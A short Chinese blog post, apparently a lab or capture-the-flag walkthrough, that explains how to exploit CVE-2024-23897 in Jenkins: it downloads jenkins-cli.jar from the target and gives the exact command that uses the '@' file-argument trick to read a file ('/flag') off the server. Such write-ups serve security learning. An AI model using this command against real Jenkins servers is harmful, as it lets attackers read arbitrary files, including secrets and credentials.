春秋云境CVE-2024-23897通关指南

发布于 2024-10-01  87 次阅读


严禁用于违法行为,任何使用与作者无关

我们首先看一下漏洞描述

OK啊!是CLI命令解析问题

我们使用访问http://IP和端口/jnlpJars/jenkins-cli.jar

会下载jenkins-cli.jar文件

再次使用java -jar jenkins-cli.jar -s http://IP和端口/ -http help 1 "@/flag"

再终端就可以看到flag了

   具体信息  ==>  展开 / 收起